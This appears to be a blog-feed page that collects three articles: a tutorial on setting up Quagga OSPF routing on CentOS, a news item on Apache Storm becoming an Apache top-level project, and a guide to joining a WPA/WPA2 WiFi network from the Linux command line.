Quagga is an open source routing software suite that can be used to turn your Linux box into a fully-fledged router that supports major routing protocols like RIP, OSPF, BGP or ISIS router. It has full provisions for IPv4 and IPv6, and supports route/prefix filtering. Quagga can be a life saver in case your production router is down, and you don't have a spare one at your disposal, so are waiting for a replacement. With proper configurations, Quagga can even be provisioned as a production router.
In this tutorial, we will connect two hypothetical branch office networks (e.g., 192.168.1.0/24 and 172.17.1.0/24) that have a dedicated link between them.

Our CentOS boxes are located at both ends of the dedicated link. The hostnames of the two boxes are set as 'site-A-RTR' and 'site-B-RTR' respectively. IP address details are provided below.
  • Site-A: 192.168.1.0/24
  • Site-B: 172.16.1.0/24
  • Peering between 2 Linux boxes: 10.10.10.0/30
The Quagga package consists of several daemons that work together. In this tutorial, we will focus on setting up the following daemons.
  1. Zebra: a core daemon, responsible for kernel interfaces and static routes.
  2. Ospfd: an IPv4 OSPF daemon.

Install Quagga on CentOS

We start the process by installing Quagga using yum.
# yum install quagga
On CentOS 7, SELinux prevents /usr/sbin/zebra from writing to its configuration directory by default. This SELinux policy interferes with the setup procedure we are going to describe, so we want to disable this policy. For that, either turn off SELinux (which is not recommended), or enable the 'zebra_write_config' boolean as follows. Skip this step if you are using CentOS 6.
# setsebool -P zebra_write_config 1
Without this change, we will see the following error when attempting to save Zebra configuration from inside Quagga's command shell.
Can't open configuration file /etc/quagga/zebra.conf.OS1Uu5.
After Quagga is installed, we configure necessary peering IP addresses, and update OSPF settings. Quagga comes with a command line shell called vtysh. The Quagga commands used inside vtysh are similar to those of major router vendors such as Cisco or Juniper.

Phase 1: Configuring Zebra

We start by creating a Zebra configuration file, and launching Zebra daemon.
# cp /usr/share/doc/quagga-XXXXX/zebra.conf.sample /etc/quagga/zebra.conf
# service zebra start
# chkconfig zebra on
Launch vtysh command shell:
# vtysh
The prompt will be changed to:
site-A-RTR#
which indicates that you are inside vtysh shell.
First, we configure the log file for Zebra. For that, enter the global configuration mode in vtysh by typing:
site-A-RTR# configure terminal
and specify log file location, then exit the mode:
site-A-RTR(config)# log file /var/log/quagga/quagga.log
site-A-RTR(config)# exit
Save configuration permanently:
site-A-RTR# write
Next, we identify available interfaces and configure their IP addresses as necessary.
site-A-RTR# show interface
Interface eth0 is up, line protocol detection is disabled
. . . . .
Interface eth1 is up, line protocol detection is disabled
. . . . .
Configure eth0 parameters:
site-A-RTR# configure terminal
site-A-RTR(config)# interface eth0
site-A-RTR(config-if)# ip address 10.10.10.1/30
site-A-RTR(config-if)# description to-site-B
site-A-RTR(config-if)# no shutdown
Go ahead and configure eth1 parameters:
site-A-RTR(config)# interface eth1
site-A-RTR(config-if)# ip address 192.168.1.1/24
site-A-RTR(config-if)# description to-site-A-LAN
site-A-RTR(config-if)# no shutdown
Now verify configuration:
site-A-RTR(config-if)# do show interface
Interface eth0 is up, line protocol detection is disabled
. . . . .
inet 10.10.10.1/30 broadcast 10.10.10.3
. . . . .
Interface eth1 is up, line protocol detection is disabled
. . . . .
inet 192.168.1.1/24 broadcast 192.168.1.255
. . . . .
site-A-RTR(config-if)# do show interface description
Interface      Status  Protocol  Description
eth0 up unknown to-site-B
eth1 up unknown to-site-A-LAN
Save configuration permanently, and quit interface configuration mode.
site-A-RTR(config-if)# do write
site-A-RTR(config-if)# exit
site-A-RTR(config)# exit
site-A-RTR#
Quit vtysh shell to come back to Linux shell.
site-A-RTR# exit
Next, enable IP forwarding so that traffic can be forwarded between eth0 and eth1 interfaces.
# echo "net.ipv4.ip_forward = 1">> /etc/sysctl.conf
# sysctl -p /etc/sysctl.conf
Repeat the IP address configuration and IP forwarding enabling steps on site-B server as well.
If all goes well, you should be able to ping site-B's peering IP 10.10.10.2 from site-A server.
Note that once Zebra daemon has started, any change made with vtysh's command line interface takes effect immediately. There is no need to restart Zebra daemon after configuration change.

Phase 2: Configuring OSPF

We start by creating an OSPF configuration file, and starting the OSPF daemon:
# cp /usr/share/doc/quagga-XXXXX/ospfd.conf.sample /etc/quagga/ospfd.conf
# service ospfd start
# chkconfig ospfd on
Now launch vtysh shell to continue with OSPF configuration:
# vtysh
Enter router configuration mode:
site-A-RTR# configure terminal
site-A-RTR(config)# router ospf
Optionally, set the router-id manually:
site-A-RTR(config-router)# router-id 10.10.10.1
Add the networks that will participate in OSPF:
site-A-RTR(config-router)# network 10.10.10.0/30 area 0
site-A-RTR(config-router)# network 192.168.1.0/24 area 0
Save configuration permanently:
site-A-RTR(config-router)# do write
Repeat the similar OSPF configuration on site-B as well:
site-B-RTR(config-router)# network 10.10.10.0/30 area 0
site-B-RTR(config-router)# network 172.16.1.0/24 area 0
site-B-RTR(config-router)# do write
The OSPF neighbors should come up now. As long as ospfd is running, any OSPF related configuration change made via vtysh shell takes effect immediately without having to restart ospfd.
In the next section, we are going to verify our Quagga setup.

Verification

1. Test with ping

To begin with, you should be able to ping the LAN subnet of site-B from site-A. Make sure that your firewall does not block ping traffic.
[root@site-A-RTR ~]# ping 172.16.1.1 -c 2

2. Check routing tables

Necessary routes should be present in both kernel and Quagga routing tables.
[root@site-A-RTR ~]# ip route
10.10.10.0/30 dev eth0  proto kernel  scope link  src 10.10.10.1
172.16.1.0/30 via 10.10.10.2 dev eth0 proto zebra metric 20
192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.1
[root@site-A-RTR ~]# vtysh
site-A-RTR# show ip route
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
I - ISIS, B - BGP, > - selected route, * - FIB route

O 10.10.10.0/30 [110/10] is directly connected, eth0, 00:14:29
C>* 10.10.10.0/30 is directly connected, eth0
C>* 127.0.0.0/8 is directly connected, lo
O>* 172.16.1.0/30 [110/20] via 10.10.10.2, eth0, 00:14:14
C>* 192.168.1.0/24 is directly connected, eth1

3. Verifying OSPF neighbors and routes

Inside vtysh shell, you can check if necessary neighbors are up, and proper routes are being learnt.
[root@site-A-RTR ~]# vtysh
site-A-RTR# show ip ospf neighbor

In this tutorial, we focused on configuring basic OSPF using Quagga. In general, Quagga allows us to easily configure a regular Linux box to speak dynamic routing protocols such as OSPF, RIP or BGP. Quagga-enabled boxes will be able to communicate and exchange routes with any other router that you may have in your network. Since it supports major open standard routing protocols, it may be a preferred choice in many scenarios. Better yet, Quagga's command line interface is almost identical to that of major router vendors like Cisco or Juniper, which makes deploying and maintaining Quagga boxes very easy.
Hope this helps.

Apache Storm is ready for prime time

$
0
0
http://www.zdnet.com/apache-storm-is-ready-for-prime-time-7000034162

Summary: Storm, a real-time framework for dealing with Big Data, has become an Apache top level project.

What do you do when you have terabytes and more of data and you want to work it with in real time? Well, one solution is to turn to Apache Storm.
Apache_Storm_logo
Storm is an open-source high-performance, distributed real-time computation framework for processing fast, large streams of data. It can be used for real-time analytics, online machine learning, continuous computation, and other Big Data jobs.
This program is also very fast. The Apache Software Foundation (ASF) claims that Storm is capable of processing more than a million tuples per second per node. Storm does this by working by streaming data in parallel over a cluster unlike MapReduce, which does it in batch jobs.
If you've been waiting for Storm to become an Apache Top-Level Project (TLP) before using it, you don't have that excuse any more. Storm became a TLP on September 29.
Officially blessed or not, Storm, which began at marketing intelligence company BackType before being acquired by Twitter, is already being used by many top companies looking for the fastest speeds for their Big Data projects. These include Alibaba, Twitter, Yahoo, and Groupon.
Typically Storm is being used in conjunction with Hadoop, but it's not limited to that. Microsoft, for example, appears to be on the verge of incorporating Storm into Azure Data Factory.
As Andrew Feng, a distinguished architect at Yahoo, said in a statement, "Today's announcement marks a major milestone in the continued evolution of Storm. We are proud of our continued contributions to Storm that have led to the hardening of security, multi-tenancy support, and increased scalability. Today, Apache Storm is widely adopted at Yahoo for real-time data processing needs including content personalization, advertising, and mobile development. It's thrilling to see the Hadoop ecosystem and community expand with the continued adoption of Storm."
So, if you're looking for an ideal answer for your real-time data processing workloads, you should check out Storm.

Connect to WiFi network from command line in Linux

$
0
0
http://www.blackmoreops.com/2014/09/18/connect-to-wifi-network-from-command-line-in-linux

How many of you failed to connect to WiFi network in Linux? Did you bumped into issues like the followings in different forums, discussion page, blogs? I am sure everyone did at some point. Following list shows just the results from Page 1 of a Google search result with “Unable to connect to WiFi network in Linux” keywords.
  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless
I came across this article in blogspot and this was one of the most well written guides I’ve ever came across. I am slightly changing that post to accommodate for all flavor of Linux releases.
Connect to WiFi network in Linux from command line - blackMORE Ops
Following guide explains how you can connect to a WiFi network in Linux from command Line. This guide will take you through the steps for connecting to a WPA/WPA2 WiFi network.

WiFi network from command line – Required tools

Following tools are required to connect to WiFi network in Linux from command line
  1. wpa_supplicant
  2. iw
  3. ip
  4. ping
Before we jump into technical jargons let’s just quickly go over each item at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211 based CLI configuration utility for wireless devices. It supports all new drivers that have been added to the kernel recently. The old tool iwconfing, which uses Wireless Extensions interface, is deprecated and it’s strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show / manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices and it helps you to find general networking informations. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see full help/man page.

ping

Good old ping For every ping, there shall be a pong …. ping-pong – ping-pong – ping-pong … that should explain it.
BTW man ping helps too …

Step 1: Find available WiFi adapters – WiFi network from command line

This actually help .. I mean you need to know your WiFi device name before you go an connect to a WiFi network. So just use the following command that will list all the connected WiFi adapters in your Linux machines.
root@kali:~# iw dev
phy#1
    Interface wlan0
        ifindex 4
        type managed
root@kali:~#
Let me explain the output:
This system has 1 physical WiFi adapters.
  1. Designated name: phy#1
  2. Device names: wlan0
  3. Interface Index: 4. Usually as per connected ports (which can be an USB port).
  4. Type: Managed. Type specifies the operational mode of the wireless devices. managed means the device is a WiFi station or client that connects to an access point.
Connect to WiFi network in Linux from command line - Find WiFi adapters - blackMORE Ops-1

Step 2: Check device status – WiFi network from command line

By this time many of you are thinking, why two network devices. The reason I am using two is because I would like to show how a connected and disconnected device looks like side by side. Next command will show you exactly that.
You can check that if the wireless device is up or not using the following command:
root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
root@kali:~#

As you can already see, I got once interface (wlan0) as state UP and wlan1 as state DOWN.
Look for the word “UP” inside the brackets in the first line of the output.
Connect to WiFi network in Linux from command line - Check device status- blackMORE Ops-2

In the above example, wlan1 is not UP. Execute the following command to

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFI interface
root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix
Connect to WiFi network in Linux from command line - Bring device up - blackMORE Ops-3
If you run the show link command again, you can tell that wlan1 is now UP.
root@kali:~# ip link show wlan0
4: wlan0: mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
root@kali:~#

Step 4: Check the connection status – WiFi network from command line

You can check WiFi network connection status from command line using the following command
root@kali:~# iw wlan0 link
Not connected.
root@kali:~#
Connect to WiFi network in Linux from command line - Check device connection - blackMORE Ops-4
The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected
root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0
---- truncated ----

The 2 important pieces of information from the above are the SSID and the security protocol (WPA/WPA2 vs WEP). The SSID from the above example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important because it determines what tool you use to connect to the network.
— following image is a sample only —
Connect to WiFi network in Linux from command line - Scan Wifi Network using iw - blackMORE Ops - 5

Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
abcd1234
root@kali:~#
(where 'abcd1234' was the Network password)
wpa_passphrase uses SSID as a string, that means you need to type in the passphrase for the WiFi network blackMOREOps after you run the command.
Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 6

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix
wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new configuration (it wont replace existing configurations) in the configurations file /etc/wpa_supplicant.conf.
root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin
network={
ssid="blackMOREOps"
#psk="abcd1234"
psk=42e1cbd0f7fbf3824393920ea41ad6cc8528957a80a404b24b5e4461a31c820c
}
root@kali:~#

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be using wpa_supplicant to connect. Use the following command
root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
root@kali:~#
Where,
-B means run wpa_supplicant in the background.
-D specifies the wireless driver. wext is the generic driver.
-c specifies the path for the configuration file.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 7

Use the iwcommand to verify that you are indeed connected to the SSID.
root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Until step 7, we’ve spent time connecting to the WiFi network. Now use dhclient to get an IP address by DHCP
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~#
You can use ip or ifconfig command to verify the IP address assigned by DHCP. The IP address is 10.0.0.4 from below.
root@kali:~# ip addr show wlan0
4: wlan0: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.4/24 brd 10.0.0.255 scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link
       valid_lft forever preferred_lft forever
root@kali:~#

(or)

root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30
inet addr:10.0.0.4 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)

root@kali:~#
Add default routing rule.The last configuration step is to make sure that you have the proper routing rules.
root@kali:~# ip route show 
default via 10.0.0.138 dev wlan0
10.0.0.0/24 dev wlan0  proto kernel  scope link  src 10.0.0.4

Connect to WiFi network in Linux from command line - Check Routing and DHCP - blackMORE Ops - 8

Step 9: Test connectivity – WiFi network from command line

Ping Google’s IP to confirm network connection (or you can just browse?)
root@kali:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=3 ttl=42 time=265 ms
64 bytes from 8.8.8.8: icmp_req=4 ttl=42 time=176 ms
64 bytes from 8.8.8.8: icmp_req=5 ttl=42 time=174 ms
64 bytes from 8.8.8.8: icmp_req=6 ttl=42 time=174 ms
^C
--- 8.8.8.8 ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms
root@kali:~#

Summary

This is a very detailed and long guide. Here is a short summary of all the things you need to do in just few line.
root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping 8.8.8.8
(Where wlan0 is wifi adapter and blackMOREOps is SSID)
(Add Routing manually)
root@kali:~# ip route add default via 10.0.0.138 dev wlan0
At the end of it, you should be able to connect to WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit commands as required to meet your needs.
Thanks for reading.
Viewing all 1407 articles
Browse latest View live